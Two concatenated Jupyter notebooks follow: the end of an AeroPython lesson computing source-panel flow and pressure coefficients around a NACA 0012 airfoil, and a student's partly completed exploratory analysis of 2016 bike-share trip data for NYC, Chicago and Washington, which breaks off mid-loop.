self.beta = math.acos((yb - ya) / self.length)
elif xb - xa > 0.0:
self.beta = math.pi + math.acos(-(yb - ya) / self.length)
# location of the panel
if self.beta <= math.pi:
self.loc = 'upper'
else:
self.loc = 'lower'
self.sigma = 0.0 # source strength
self.vt = 0.0 # tangential velocity
self.cp = 0.0 # pressure coefficient
# For the circular cylinder, the discretization into panels was really easy. This is the part that gets more complicated when you want to compute the flow around a general geometry, while the solution part is effectively the same as in [Lesson 9](09_Lesson09_flowOverCylinder.ipynb).
#
# The function below will create the panels from the geometry data that was read from a file. It is better to have small panels near the leading-edge and the trailing edge, where the curvature is large. One method to get a non uniform distribution around the airfoil is to first discretize a circle with diameter equal to the airfoil's chord, with the leading edge and trailing edge touching the circle at a node, as shown in the following sketch.
#
# <img src="./resources/naca0012_in_circle.png" width="300">
# Then, we store the $x$-coordinates of the circle points, `x_circle`, which will also be the $x$-coordinates of the panel nodes, `x`, and project the $y$-coordinates of the circle points onto the airfoil by interpolation. We end up with a node distribution on the airfoil that is refined near the leading edge and the trailing edge. It will look like this:
#
# <img src="./resources/naca0012_discretized_in_circle.png" width="300">
# With the discretization method just described, the function `define_panels()` returns an array of objects, each an instance of the class `Panel` and containing all information about a panel, given the desired number of panels and the set of body coordinates.
#
# A few remarks about the implementation of the function `define_panels()`:
#
# * we just need to compute the $x$-coordinates of the circle (`x_circle`) since the $y$-coordinates of the panel nodes will be computed by interpolation;
# * we create a circle with `N+1` points, but the first and last points coincide;
# * we extend our NumPy arrays by adding an extra value that is equal to the first one; thus we don't have to do anything special with the value `x[i+1]` in the different loops;
# * the *while*-loop is used to find two consecutive points, (`x[I]`,`y[I]`) and (`x[I+1]`,`y[I+1]`), on the foil such that the interval [`x[I]`,`x[I+1]`] contains the value `x_ends[i]`; we use the keyword `break` to get out of the loop;
# * once the two points have been identified, the value `y_ends[i]` is computed by interpolation.
def define_panels(x, y, N=40):
"""
Discretizes the geometry into panels using the 'cosine' method.
Parameters
----------
x: 1D array of floats
x-coordinate of the points defining the geometry.
y: 1D array of floats
y-coordinate of the points defining the geometry.
N: integer, optional
Number of panels;
default: 40.
Returns
-------
panels: 1D Numpy array of Panel objects
The discretization of the geometry into panels.
"""
R = (x.max() - x.min()) / 2 # radius of the circle
x_center = (x.max() + x.min()) / 2 # x-coord of the center
# define x-coord of the circle points
x_circle = x_center + R * numpy.cos(numpy.linspace(0.0, 2 * math.pi, N + 1))
x_ends = numpy.copy(x_circle) # projection of the x-coord on the surface
y_ends = numpy.empty_like(x_ends) # initialization of the y-coord Numpy array
x, y = numpy.append(x, x[0]), numpy.append(y, y[0]) # extend arrays using numpy.append
# computes the y-coordinate of end-points
I = 0
for i in range(N):
while I < len(x) - 1:
if (x[I] <= x_ends[i] <= x[I + 1]) or (x[I + 1] <= x_ends[i] <= x[I]):
break
else:
I += 1
a = (y[I + 1] - y[I]) / (x[I + 1] - x[I])
b = y[I + 1] - a * x[I + 1]
y_ends[i] = a * x_ends[i] + b
y_ends[N] = y_ends[0]
panels = numpy.empty(N, dtype=object)
for i in range(N):
panels[i] = Panel(x_ends[i], y_ends[i], x_ends[i + 1], y_ends[i + 1])
return panels
# Now we can use this function, calling it with a desired number of panels whenever we execute the cell below. We also plot the resulting geometry.
# +
N = 40 # number of panels
panels = define_panels(x, y, N) # discretizes of the geometry into panels
# plot the geometry and the panels
width = 10
pyplot.figure(figsize=(width, width))
pyplot.grid()
pyplot.xlabel('x', fontsize=16)
pyplot.ylabel('y', fontsize=16)
pyplot.plot(x, y, color='k', linestyle='-', linewidth=2)
pyplot.plot(numpy.append([panel.xa for panel in panels], panels[0].xa),
numpy.append([panel.ya for panel in panels], panels[0].ya),
linestyle='-', linewidth=1, marker='o', markersize=6, color='#CD2305')
pyplot.axis('scaled', adjustable='box')
pyplot.xlim(-0.1, 1.1)
pyplot.ylim(-0.1, 0.1);
# -
# ## Freestream conditions
# The NACA0012 airfoil will be immersed in a uniform flow with velocity $U_\infty$ and an angle of attack $\alpha=0$. Even though it may seem like overkill to create a class for the freestream, we'll do it anyway. When creating a class, one is expecting to also create several instances of its objects. Here, we just have one freestream, so why define a class? Well, it makes the code more readable and does not block the programmer from using the variable names `u_inf` and `alpha` for something else outside of the class.
# Also, every time we need the freestream condition as input to a function, we will just have to pass the object as an argument and not all the attributes of the freestream.
class Freestream:
"""
Freestream conditions.
"""
def __init__(self, u_inf=1.0, alpha=0.0):
"""
Sets the freestream speed and angle (with the x-axis).
Parameters
----------
u_inf: float, optional
Freestream speed;
default: 1.0.
alpha: float, optional
Angle of attack in degrees;
default: 0.0.
"""
self.u_inf = u_inf
self.alpha = numpy.radians(alpha) # degrees --> radians
# define and creates the object freestream
u_inf = 1.0 # freestream spee
alpha = 0.0 # angle of attack (in degrees)
freestream = Freestream(u_inf, alpha) # instantiation of the object freestream
# ## Flow tangency boundary condition
# Enforcing the flow-tangency condition on each *control point* approximately makes the body geometry correspond to a dividing streamline (and the approximation improves if we represented the body with more and more panels). So, for each panel $i$, we make $u_n=0$ at $(x_{c_i},y_{c_i})$, which leads to the equation derived in the previous lesson:
#
# $$
# \begin{equation}
# u_{n_i} = \frac{\partial}{\partial n_i}\left\lbrace \phi\left(x_{c_i},y_{c_i}\right) \right\rbrace = 0
# \end{equation}
# $$
#
# i.e.
#
# $$
# \begin{equation}
# \begin{split}
# 0 = & U_\infty \cos\beta_i + \frac{\sigma_i}{2} \\
# & + \sum_{j=1,j\neq i}^{N_p} \frac{\sigma_j}{2\pi} \int \frac{\left(x_{c_i}-x_j(s_j)\right) \cos\beta_i + \left(y_{c_i}-y_j(s_j)\right) \sin\beta_i}{\left(x_{c_i}-x_j(s)\right)^2 + \left(y_{c_i}-y_j(s)\right)^2} {\rm d}s_j
# \end{split}
# \end{equation}
# $$
# In the equation above, we calculate the derivative of the potential in the normal direction to enforce the flow tangency condition on each panel. But later, we will have to calculate the derivative in the tangential direction to compute the surface pressure coefficient. And, when we are interested in plotting the velocity field onto a mesh, we will have to calculate the derivative in the $x$- and $y$-direction.
#
# Therefore the function below is similar to the one implemented in [Lesson 9](09_Lesson09_flowOverCylinder.ipynb) to obtain the integrals along each panel, but we've generalized it to adapt to the direction of derivation (by means of two new arguments, `dxdz` and `dydz`, which respectively represent the value of $\frac{\partial x_{c_i}}{\partial z_i}$ and $\frac{\partial y_{c_i}}{\partial z_i}$, $z_i$ being the desired direction).
#
# Moreover, the function is also more general in the sense of allowing any evaluation point, not just a control point on a panel (the argument `p_i` has been replaced by the coordinates `x` and `y` of the control-point, and `p_j` has been replaced with `panel`).
def integral(x, y, panel, dxdz, dydz):
"""
Evaluates the contribution of a panel at one point.
Parameters
----------
x: float
x-coordinate of the target point.
y: float
y-coordinate of the target point.
panel: Panel object
Source panel which contribution is evaluated.
dxdz: float
Derivative of x in the z-direction.
dydz: float
Derivative of y in the z-direction.
Returns
-------
Integral over the panel of the influence at the given target point.
"""
def integrand(s):
return (((x - (panel.xa - math.sin(panel.beta) * s)) * dxdz +
(y - (panel.ya + math.cos(panel.beta) * s)) * dydz) /
((x - (panel.xa - math.sin(panel.beta) * s))**2 +
(y - (panel.ya + math.cos(panel.beta) * s))**2) )
return integrate.quad(integrand, 0.0, panel.length)[0]
# ## Building the linear system
# Here, we build and solve the linear system of equations of the form
#
# $$
# \begin{equation}
# [A][\sigma] = [b]
# \end{equation}
# $$
#
# In building the matrix, below, we call the `integral()` function with the correct values for the last parameters: $\cos \beta_i$ and $\sin\beta_i$, corresponding to a derivative in the normal direction.
#
# Finally, we use `linalg.solve()` from NumPy to solve the system and find the strength of each panel.
# +
def build_matrix(panels):
"""
Builds the source matrix.
Parameters
----------
panels: 1D array of Panel object
The source panels.
Returns
-------
A: 2D Numpy array of floats
The source matrix (NxN matrix; N is the number of panels).
"""
N = len(panels)
A = numpy.empty((N, N), dtype=float)
numpy.fill_diagonal(A, 0.5)
for i, p_i in enumerate(panels):
for j, p_j in enumerate(panels):
if i != j:
A[i, j] = 0.5 / math.pi * integral(p_i.xc, p_i.yc, p_j,
math.cos(p_i.beta),
math.sin(p_i.beta))
return A
def build_rhs(panels, freestream):
"""
Builds the RHS of the linear system.
Parameters
----------
panels: 1D array of Panel objects
The source panels.
freestream: Freestream object
The freestream conditions.
Returns
-------
b: 1D Numpy array of floats
RHS of the linear system.
"""
b = numpy.empty(len(panels), dtype=float)
for i, panel in enumerate(panels):
b[i] = -freestream.u_inf * math.cos(freestream.alpha - panel.beta)
return b
# -
A = build_matrix(panels) # compute the singularity matrix
b = build_rhs(panels, freestream) # compute the freestream RHS
# +
# solve the linear system
sigma = numpy.linalg.solve(A, b)
for i, panel in enumerate(panels):
panel.sigma = sigma[i]
# -
# ## Surface pressure coefficient
# From Bernoulli's equation, the pressure coefficient on the $i$-th panel is
#
# $$
# \begin{equation}
# C_{p_i} = 1-\left(\frac{u_{t_i}}{U_\infty}\right)^2
# \end{equation}
# $$
#
# where $u_{t_i}$ is the tangential component of the velocity at the center point of the $i$-th panel,
#
# $$
# \begin{equation}
# \begin{split}
# u_{t_i} = & -U_\infty \sin\beta_i \\
# & + \sum_{j=1}^{N_p} \frac{\sigma_j}{2\pi} \int \frac{\left(x_{c_i}-x_j(s_j)\right) \frac{\partial x_{c_i}}{\partial t_i} + \left(y_{c_i}-y_j(s_j)\right) \frac{\partial y_{c_i}}{\partial t_i}}{\left(x_{c_i}-x_j(s)\right)^2 + \left(y_{c_i}-y_j(s)\right)^2} {\rm d}s_j
# \end{split}
# \end{equation}
# $$
#
# with
#
# $$
# \begin{equation}
# \frac{\partial x_{c_i}}{\partial t_i} = -\sin\beta_i \quad\text{and} \quad \frac{\partial y_{c_i}}{\partial t_i} = \cos\beta_i
# \end{equation}
# $$
#
# Notice that below we call the function `integral()` with different arguments: $-\sin\beta_i$ and $\cos\beta_i$ to get the derivation in the tangential direction.
def get_tangential_velocity(panels, freestream):
"""
Computes the tangential velocity on the surface of the panels.
Parameters
---------
panels: 1D array of Panel objects
The source panels.
freestream: Freestream object
The freestream conditions.
"""
N = len(panels)
A = numpy.empty((N, N), dtype=float)
numpy.fill_diagonal(A, 0.0)
for i, p_i in enumerate(panels):
for j, p_j in enumerate(panels):
if i != j:
A[i, j] = 0.5 / math.pi * integral(p_i.xc, p_i.yc, p_j,
-math.sin(p_i.beta),
math.cos(p_i.beta))
b = freestream.u_inf * numpy.sin([freestream.alpha - panel.beta
for panel in panels])
sigma = numpy.array([panel.sigma for panel in panels])
vt = numpy.dot(A, sigma) + b
for i, panel in enumerate(panels):
panel.vt = vt[i]
# compute the tangential velocity at the center-point of each panel
get_tangential_velocity(panels, freestream)
def get_pressure_coefficient(panels, freestream):
"""
Computes the surface pressure coefficients on the panels.
Parameters
---------
panels: 1D array of Panel objects
The source panels.
freestream: Freestream object
The freestream conditions.
"""
for panel in panels:
panel.cp = 1.0 - (panel.vt / freestream.u_inf)**2
# computes the surface pressure coefficients
get_pressure_coefficient(panels, freestream)
# ### Theoretical solution
# There is a classical method to obtain the theoretical characteristics of airfoils, known as *Theodorsen's method*. It uses the Joukowski transformation but is able to deal with any airfoil by an additional transformation between a "near circle" and a circle. The method is hairy indeed! But the resulting values of pressure coefficient are provided for some airfoils in table form in the 1945 [NACA Report No.824](http://ntrs.nasa.gov/archive/nasa/casi.ntrs.nasa.gov/19930090976.pdf), available from the NASA web server (see p. 71).
#
# The values of $(u/U_{\infty})^2$ are given for several stations along the chord length. We transcribed them here, saving them into an array:
voverVsquared=numpy.array([0.0, 0.64, 1.01, 1.241, 1.378, 1.402, 1.411, 1.411,
1.399, 1.378, 1.35, 1.288, 1.228, 1.166, 1.109, 1.044,
0.956, 0.906, 0.0])
print(voverVsquared)
xtheo=numpy.array([0.0, 0.5, 1.25, 2.5, 5.0, 7.5, 10.0, 15.0, 20.0, 25.0, 30.0,
40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 95.0, 100.0])
xtheo /= 100
print(xtheo)
# ### And plot the result!
# We will use the values from the NACA report (also given in the book by Abbot and <NAME>, ["Theory of Wing Sections,"](http://books.google.com/books/about/Theory_of_Wing_Sections_Including_a_Summ.html?id=DPZYUGNyuboC) 1949) to visually compare the pressure distribution with the result of our source panel method. Let's see how it looks!
# plot the surface pressure coefficient
pyplot.figure(figsize=(10, 6))
pyplot.grid()
pyplot.xlabel('x', fontsize=16)
pyplot.ylabel('$C_p$', fontsize=16)
pyplot.plot([panel.xc for panel in panels if panel.loc == 'upper'],
[panel.cp for panel in panels if panel.loc == 'upper'],
label='upper',
color='r', linewidth=1, marker='x', markersize=8)
pyplot.plot([panel.xc for panel in panels if panel.loc == 'lower'],
[panel.cp for panel in panels if panel.loc == 'lower'],
label='lower',
color='b', linewidth=0, marker='d', markersize=6)
pyplot.plot(xtheo, 1-voverVsquared,
label='theoretical',
color='k', linestyle='--',linewidth=2)
pyplot.legend(loc='best', prop={'size':14})
pyplot.xlim(-0.1, 1.1)
pyplot.ylim(1.0, -0.6)
pyplot.title('Number of panels : {}'.format(N));
# That looks pretty good! The only place where the panel method doesn't quite match the tabulated data from Theordorsen's method is at the trailing edge. But note that the flow-tangency boundary condition in the panel method is applied at the control point of the panel (not at the endpoints), so this discrepancy is not surprising.
# ##### Accuracy check
# For a closed body, the sum of all the source strengths must be zero. If not, it means the body would be adding or absorbing mass from the flow! Therefore, we should have
#
# $$
# \sum_{j=1}^{N} \sigma_j l_j = 0
# $$
#
# where $l_j$ is the length of the $j^{\text{th}}$ panel.
#
# With this, we can get a get an idea of the accuracy of the source panel method.
# calculate the accuracy
accuracy = sum([panel.sigma*panel.length for panel in panels])
print('--> sum of source/sink strengths: {}'.format(accuracy))
# ## Streamlines onto a mesh grid
# To get a streamline plot, we have to create a mesh (like we've done in all *AeroPython* lessons!) and compute the velocity field onto it. Knowing the strength of every panel, we find the $x$-component of the velocity by taking derivative of the velocity potential in the $x$-direction, and the $y$-component by taking derivative in the $y$-direction:
#
# $$
# u\left(x,y\right) = \frac{\partial}{\partial x}\left\lbrace \phi\left(x,y\right) \right\rbrace
# $$
#
# $$
# v\left(x,y\right) = \frac{\partial}{\partial y}\left\lbrace \phi\left(x,y\right) \right\rbrace
# $$
#
# Notice that here we call the function `integral()` with $1,0$ as the final arguments when calculating the derivatives in the $x$-direction, and $0,1$ for the derivatives in th $y$-direction.
#
# In addition, we use the function `numpy.vectorize()` (as we did in [Lesson 8](08_Lesson08_sourceSheet.ipynb)) to avoid the nested loops over the domain.
def get_velocity_field(panels, freestream, X, Y):
"""
Computes the velocity field on a given 2D mesh.
Parameters
---------
panels: 1D array of Panel objects
The source panels.
freestream: Freestream object
The freestream conditions.
X: 2D Numpy array of floats
x-coordinates of the mesh points.
Y: 2D Numpy array of floats
y-coordinate of the mesh points.
Returns
-------
u: 2D Numpy array of floats
x-component of the velocity vector field.
v: 2D Numpy array of floats
y-component of the velocity vector field.
"""
# freestream contribution
u = freestream.u_inf * math.cos(freestream.alpha) * numpy.ones_like(X, dtype=float)
v = freestream.u_inf * math.sin(freestream.alpha) * numpy.ones_like(X, dtype=float)
# add the contribution from each source (superposition powers!!!)
vec_intregral = numpy.vectorize(integral)
for panel in panels:
u += panel.sigma / (2.0 * math.pi) * vec_intregral(X, Y, panel, 1.0, 0.0)
v += panel.sigma / (2.0 * math.pi) * vec_intregral(X, Y, panel, 0.0, 1.0)
return u, v
# +
# define a mesh grid
nx, ny = 20, 20 # number of points in the x and y directions
x_start, x_end = -1.0, 2.0
y_start, y_end = -0.3, 0.3
X, Y = numpy.meshgrid(numpy.linspace(x_start, x_end, nx),
numpy.linspace(y_start, y_end, ny))
# compute the velocity field on the mesh grid
u, v = get_velocity_field(panels, freestream, X, Y)
# -
# plot the velocity field
width = 10
pyplot.figure(figsize=(width, width))
pyplot.xlabel('x', fontsize=16)
pyplot.ylabel('y', fontsize=16)
pyplot.streamplot(X, Y, u, v,
density=1, linewidth=1, arrowsize=1, arrowstyle='->')
pyplot.fill([panel.xc for panel in panels],
[panel.yc for panel in panels],
color='k', linestyle='solid', linewidth=2, zorder=2)
pyplot.axis('scaled', adjustable='box')
pyplot.xlim(x_start, x_end)
pyplot.ylim(y_start, y_end)
pyplot.title('Streamlines around a NACA 0012 airfoil (AoA = ${}^o$)'.format(alpha),
fontsize=16);
# We can now calculate the pressure coefficient. In Lesson 9, we computed the pressure coefficient on the surface of the circular cylinder. That was useful because we have an analytical solution for the surface pressure on a cylinder in potential flow. For an airfoil, we are interested to see how the pressure looks all around it, and we make a contour plot in the flow domain.
# +
# compute the pressure field
cp = 1.0 - (u**2 + v**2) / freestream.u_inf**2
# plot the pressure field
width = 10
pyplot.figure(figsize=(width, width))
pyplot.xlabel('x', fontsize=16)
pyplot.ylabel('y', fontsize=16)
contf = pyplot.contourf(X, Y, cp,
levels=numpy.linspace(-2.0, 1.0, 100), extend='both')
cbar = pyplot.colorbar(contf,
orientation='horizontal',
shrink=0.5, pad = 0.1,
ticks=[-2.0, -1.0, 0.0, 1.0])
cbar.set_label('$C_p$', fontsize=16)
pyplot.fill([panel.xc for panel in panels],
[panel.yc for panel in panels],
color='k', linestyle='solid', linewidth=2, zorder=2)
pyplot.axis('scaled', adjustable='box')
pyplot.xlim(x_start, x_end)
pyplot.ylim(y_start, y_end)
pyplot.title('Contour of pressure field', fontsize=16);
# -
# ### Final words
#
# We've learned to use a source-sheet to represent any solid body: first a [circular cylinder](09_Lesson09_flowOverCylinder.ipynb) (which we knew we could get by superposing a doublet and a freestream), and now an airfoil.
#
# But what is the feature of airfoils that makes them interesting? Well, the fact that we can use them to generate lift and make things that fly, of course! But what do we need to generate lift? Think, think ... what is it?
# ## References
# 1. [Airfoil Tools](http://airfoiltools.com/index), website providing airfoil data.
# 1. <NAME>, <NAME> and <NAME>, Jr. (1945), "Summary of Airfoil Data," NACA Report No.824, [PDF on the NASA web server](http://ntrs.nasa.gov/archive/nasa/casi.ntrs.nasa.gov/19930090976.pdf) (see p. 71)
# 1. <NAME>, <NAME>, "Theory of Wing Sections, Including a Summary of Airfoil Data" (1949), Dover Press.
#
# A further reference on Theodorsen's method is:
#
# * <NAME>, <NAME> (1991), "Conformal Mapping: Methods and Applications." Dover edition in 2003. [Read on Google Books](https://books.google.com/books?id=qe-7AQAAQBAJ&lpg=PA128&ots=wbg0jLlqq5&dq=method%20theodorsen&pg=PA128#v=onepage&q=%22method%20of%20theodorsen%20and%20garrick%22&f=false)
#
# ---
# ###### Please ignore the cell below. It just loads our style for the notebook.
from IPython.core.display import HTML
def css_styling(filepath):
styles = open(filepath, 'r').read()
return HTML(styles)
css_styling('../styles/custom.css')
|
lessons/10_Lesson10_sourcePanelMethod.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # 2016 US Bike Share Activity Snapshot
#
# ## Table of Contents
# - [Introduction](#intro)
# - [Posing Questions](#pose_questions)
# - [Data Collection and Wrangling](#wrangling)
# - [Condensing the Trip Data](#condensing)
# - [Exploratory Data Analysis](#eda)
# - [Statistics](#statistics)
# - [Visualizations](#visualizations)
# - [Performing Your Own Analysis](#eda_continued)
# - [Conclusions](#conclusions)
#
# <a id='intro'></a>
# ## Introduction
#
#
# Over the past decade, bicycle-sharing systems have been growing in number and popularity in cities across the world. Bicycle-sharing systems allow users to rent bicycles for short trips, typically 30 minutes or less. Thanks to the rise in information technologies, it is easy for a user of the system to access a dock within the system to unlock or return bicycles. These technologies also provide a wealth of data that can be used to explore how these bike-sharing systems are used.
#
# In this project, you will perform an exploratory analysis on data provided by [Motivate](https://www.motivateco.com/), a bike-share system provider for many major cities in the United States. You will compare the system usage between three large cities: New York City, Chicago, and Washington, DC. You will also see if there are any differences within each system for those users that are registered, regular users and those users that are short-term, casual users.
# <a id='pose_questions'></a>
# ## Posing Questions
#
#
# **Question 1**: Write at least two questions related to bike sharing that you think could be answered by data.
#
# **Answer**: what is the most commomn use time?
# what is the most common month and what type of people use most?
#
# <a id='wrangling'></a>
# ## Data Collection and Wrangling
#
# Now it's time to collect and explore our data. In this project, we will focus on the record of individual trips taken in 2016 from our selected cities: New York City, Chicago, and Washington, DC. Each of these cities has a page where we can freely download the trip data.:
#
# - New York City (Citi Bike): [Link](https://www.citibikenyc.com/system-data)
# - Chicago (Divvy): [Link](https://www.divvybikes.com/system-data)
# - Washington, DC (Capital Bikeshare): [Link](https://www.capitalbikeshare.com/system-data)
#
# If you visit these pages, you will notice that each city has a different way of delivering its data. Chicago updates with new data twice a year, Washington DC is quarterly, and New York City is monthly. **However, you do not need to download the data yourself.** The data has already been collected for you in the `/data/` folder of the project files. While the original data for 2016 is spread among multiple files for each city, the files in the `/data/` folder collect all of the trip data for the year into one file per city. Some data wrangling of inconsistencies in timestamp format within each city has already been performed for you. In addition, a random 2% sample of the original data is taken to make the exploration more manageable.
#
# **Question 2**: However, there is still a lot of data for us to investigate, so it's a good idea to start off by looking at one entry from each of the cities we're going to analyze. Run the first code cell below to load some packages and functions that you'll be using in your analysis. Then, complete the second code cell to print out the first trip recorded from each of the cities (the second line of each data file).
#
#
## import all necessary packages and functions.
import csv # read and write csv files
from datetime import datetime # operations to parse dates
from pprint import pprint # use to print data structures like dictionaries in
import pandas as pd # a nicer way than the base print function.
# +
def print_first_point(filename):
"""
This function prints and returns the first data point (second row) from
a csv file that includes a header row.
"""
# print city name for reference
city = filename.split('-')[0].split('/')[-1]
print('\nCity: {}'.format(city))
with open(filename, 'r') as f_in:
trip_reader =csv.DictReader(f_in)
first_trip =trip_reader.__next__()
print("first trip details")
pprint(first_trip)
print(type(first_trip))
# output city name and first trip for later testing
return (city, first_trip)
# list of files for each city
data_files = ['./data/NYC-CitiBike-2016.csv',
'./data/Chicago-Divvy-2016.csv',
'./data/Washington-CapitalBikeshare-2016.csv',]
# print the first trip from each file, store in dictionary
example_trips = {}
for data_file in data_files:
city, first_trip = print_first_point(data_file)
example_trips[city] = first_trip
# -
# If everything has been filled out correctly, you should see below the printout of each city name (which has been parsed from the data file name) that the first trip has been parsed in the form of a dictionary. When you set up a `DictReader` object, the first row of the data file is normally interpreted as column names. Every other row in the data file will use those column names as keys, as a dictionary is generated for each row.
#
# This will be useful since we can refer to quantities by an easily-understandable label instead of just a numeric index. For example, if we have a trip stored in the variable `row`, then we would rather get the trip duration from `row['duration']` instead of `row[0]`.
#
# <a id='condensing'></a>
# ### Condensing the Trip Data
#
# It should also be observable from the above printout that each city provides different information. Even where the information is the same, the column names and formats are sometimes different. To make things as simple as possible when we get to the actual exploration, we should trim and clean the data. Cleaning the data makes sure that the data formats across the cities are consistent, while trimming focuses only on the parts of the data we are most interested in to make the exploration easier to work with.
#
# You will generate new data files with five values of interest for each trip: trip duration, starting month, starting hour, day of the week, and user type. Each of these may require additional wrangling depending on the city:
#
# - **Duration**: This has been given to us in seconds (New York, Chicago) or milliseconds (Washington). A more natural unit of analysis will be if all the trip durations are given in terms of minutes.
# - **Month**, **Hour**, **Day of Week**: Ridership volume is likely to change based on the season, time of day, and whether it is a weekday or weekend. Use the start time of the trip to obtain these values. The New York City data includes the seconds in their timestamps, while Washington and Chicago do not. The [`datetime`](https://docs.python.org/3/library/datetime.html) package will be very useful here to make the needed conversions.
# - **User Type**: It is possible that users who are subscribed to a bike-share system will have different patterns of use compared to users who only have temporary passes. Washington divides its users into two types: 'Registered' for users with annual, monthly, and other longer-term subscriptions, and 'Casual', for users with 24-hour, 3-day, and other short-term passes. The New York and Chicago data uses 'Subscriber' and 'Customer' for these groups, respectively. For consistency, you will convert the Washington labels to match the other two.
#
#
# **Question 3a**: Complete the helper functions in the code cells below to address each of the cleaning tasks described above.
# +
import datetime
def duration_in_mins(datum, city):
"""
Takes as input a dictionary containing info about a single trip (datum) and
its origin city (city) and returns the trip duration in units of minutes.
Remember that Washington is in terms of milliseconds while Chicago and NYC
are in terms of seconds.
HINT: The csv module reads in all of the data as strings, including numeric
values. You will need a function to convert the strings into an appropriate
numeric type when making your transformations.
see https://docs.python.org/3/library/functions.html
"""
if city=="Washington":
duration_mili=int(datum["Duration (ms)"])
duration=datetime.timedelta(milliseconds=duration_mili)
duration_min=duration.total_seconds()/60
return duration_min
else:
duration_sec=int(datum["tripduration"])
duration_min=duration_sec/60
return duration_min
# Some tests to check that your code works. There should be no output if all of
# the assertions pass. The `example_trips` dictionary was obtained from when
# you printed the first trip from each of the original data files.
tests = {'NYC': 13.9833,
'Chicago': 15.4333,
'Washington': 7.1231}
for city in tests:
assert abs(duration_in_mins(example_trips[city], city) - tests[city]) < .001
# +
def time_of_trip(datum, city):
"""
Takes as input a dictionary containing info about a single trip (datum) and
its origin city (city) and returns the month, hour, and day of the week in
which the trip was made.
Remember that NYC includes seconds, while Washington and Chicago do not.
HINT: You should use the datetime module to parse the original date
strings into a format that is useful for extracting the desired information.
see ze
"""
if city=="Washington":
date=datum["Start date"].split()[0]
month,day,year=(int(x) for x in date.split('/'))
day_of_week = datetime.date(year, month, day).strftime("%A")
hour=int(datum["Start date"].split()[1].split(":")[0])
elif city=="NYC":
date=datum["starttime"].split()[0]
month,day,year=(int(x) for x in date.split('/'))
day_of_week = datetime.date(year, month, day).strftime("%A")
hour=int(datum["starttime"].split()[1].split(":")[0])
else:
date=datum["starttime"].split()[0]
month,day,year=(int(x) for x in date.split('/'))
day_of_week = datetime.date(year, month, day).strftime("%A")
hour=int(datum["starttime"].split()[1].split(":")[0])
return (month, hour, day_of_week)
# Some tests to check that your code works. There should be no output if all of
# the assertions pass. The `example_trips` dictionary was obtained from when
# you printed the first trip from each of the original data files.
tests = {'NYC': (1, 0, 'Friday'),
'Chicago': (3, 23, 'Thursday'),
'Washington': (3, 22, 'Thursday')}
for city in tests:
assert time_of_trip(example_trips[city], city) == tests[city]
# +
def type_of_user(datum, city):
"""
Takes as input a dictionary containing info about a single trip (datum) and
its origin city (city) and returns the type of system user that made the
trip.
Remember that Washington has different category names compared to Chicago
and NYC.
"""
if city =="Washington":
if datum["Member Type"]=="Registered":
user_type="Subscriber"
else:
user_type="Customer"
else:
user_type=datum["usertype"]
return user_type
# Some tests to check that your code works. There should be no output if all of
# the assertions pass. The `example_trips` dictionary was obtained from when
# you printed the first trip from each of the original data files.
tests = {'NYC': 'Customer',
'Chicago': 'Subscriber',
'Washington': 'Subscriber'}
for city in tests:
assert type_of_user(example_trips[city], city) == tests[city]
# -
# **Question 3b**: Now, use the helper functions you wrote above to create a condensed data file for each city consisting only of the data fields indicated above. In the `/examples/` folder, you will see an example datafile from the [Bay Area Bike Share](http://www.bayareabikeshare.com/open-data) before and after conversion. Make sure that your output is formatted to be consistent with the example file.
def condense_data(in_file, out_file, city):
"""
This function takes full data from the specified input file
and writes the condensed data to a specified output file. The city
argument determines how the input file will be parsed.
HINT: See the cell below to see how the arguments are structured!
"""
with open(out_file, 'w') as f_out, open(in_file, 'r') as f_in:
out_colnames = ['duration', 'month', 'hour', 'day_of_week', 'user_type']
trip_writer = csv.DictWriter(f_out, fieldnames = out_colnames)
trip_writer.writeheader()
trip_reader = csv.DictReader(f_in)
for row in trip_reader:
# set up a dictionary to hold the values for the cleaned and trimmed
# data point
new_point = {}
new_point[out_colnames[0]]=duration_in_mins(row , city)
new_point[out_colnames[1]],new_point[out_colnames[2]],new_point[out_colnames[3]]=time_of_trip(row, city)
new_point[out_colnames[4]]=type_of_user(row, city)
trip_writer.writerow(new_point)
# +
# Run this cell to check your work
city_info = {'Washington': {'in_file': './data/Washington-CapitalBikeshare-2016.csv',
'out_file': './data/Washington-2016-Summary.csv'},
'Chicago': {'in_file': './data/Chicago-Divvy-2016.csv',
'out_file': './data/Chicago-2016-Summary.csv'},
'NYC': {'in_file': './data/NYC-CitiBike-2016.csv',
'out_file': './data/NYC-2016-Summary.csv'}}
for city, filenames in city_info.items():
condense_data(filenames['in_file'], filenames['out_file'], city)
print_first_point(filenames['out_file'])
# -
#
# <a id='eda'></a>
# ## Exploratory Data Analysis
#
# Now that you have the data collected and wrangled, you're ready to start exploring the data. In this section you will write some code to compute descriptive statistics from the data. You will also be introduced to the `matplotlib` library to create some basic histograms of the data.
#
# <a id='statistics'></a>
# ### Statistics
#
# First, let's compute some basic counts. The first cell below contains a function that uses the csv module to iterate through a provided data file, returning the number of trips made by subscribers and customers. The second cell runs this function on the example Bay Area data in the `/examples/` folder. Modify the cells to answer the question below.
#
# **Question 4a**: Which city has the highest number of trips? Which city has the highest proportion of trips made by subscribers? Which city has the highest proportion of trips made by short-term customers?
#
# **Answer**:NYC has the max number of trips, the number is 276798 NYC has the highest proportion of trips made by subscribers, the pecentage is 88.83% Chicago has the highest proportion of trips made by customer, the pecentage is 23.77%
def number_of_trips(filename):
"""
This function reads in a file with trip data and reports the number of
trips made by subscribers, customers, and total overall.
"""
with open(filename, 'r') as f_in:
# set up csv reader object
reader = csv.DictReader(f_in)
# initialize count variables
n_subscribers = 0
n_customers = 0
total_subs_ride=0
total_cust_ride=0
# tally up ride types
for row in reader:
if row['user_type'] == 'Subscriber':
n_subscribers += 1
total_subs_ride += float(row['duration'])
else:
n_customers += 1
total_cust_ride += float(row['duration'])
# compute total number of rides
n_total = n_subscribers + n_customers
pct_subscribers = n_subscribers/n_total
pct_customers = n_customers/n_total
avg_subs_ride = total_subs_ride/n_subscribers
avg_cust_ride = total_cust_ride/n_customers
# return tallies as a tuple
return(n_subscribers, n_customers, n_total,pct_subscribers,pct_customers,avg_subs_ride,avg_cust_ride)
data_file = ['./data/Washington-2016-Summary.csv','./data/Chicago-2016-Summary.csv','./data/NYC-2016-Summary.csv']
for path in data_file:
